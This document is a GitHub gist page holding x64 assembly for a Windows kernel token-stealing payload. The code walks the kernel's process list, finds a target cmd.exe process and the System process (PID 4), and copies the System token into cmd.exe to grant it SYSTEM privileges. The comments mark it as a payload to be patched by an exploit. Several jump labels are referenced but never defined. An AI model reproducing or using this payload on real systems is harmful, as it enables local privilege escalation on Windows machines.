Skip to content

Instantly share code, notes, and snippets.

Created January 1, 2018 23:31
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
Star You must be signed in to star a gist
What would you like to do?
[BITS 64]
push rax
push rbx
push rcx
push rsi
push rdi
mov rax, [gs:0x180 + 0x8] ; Get 'CurrentThread' from KPRCB
mov rax, [rax + 0x220] ; Get 'Process' property from current thread
cmp dword [rax + 0x2e0], 0x41414141 ; Search for 'cmd.exe' process ('AAAA' replaced by exploit)
je found_cmd_process
mov rax, [rax + 0x2e8] ; If not found, go to next process
sub rax, 0x2e8
jmp next_process
mov rbx, rax ; Save our cmd.exe EPROCESS for later
cmp dword [rax + 0x2e0], 0x00000004 ; Search for PID 4 (System process)
je found_system_process
mov rax, [rax + 0x2e8]
sub rax, 0x2e8
jmp find_system_process
mov rcx, [rax + 0x358] ; Take TOKEN from System process
mov [rbx+0x358], rcx ; And copy it to the cmd.exe process
pop rdi
pop rsi
pop rcx
pop rbx
pop rax
; return goes here
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment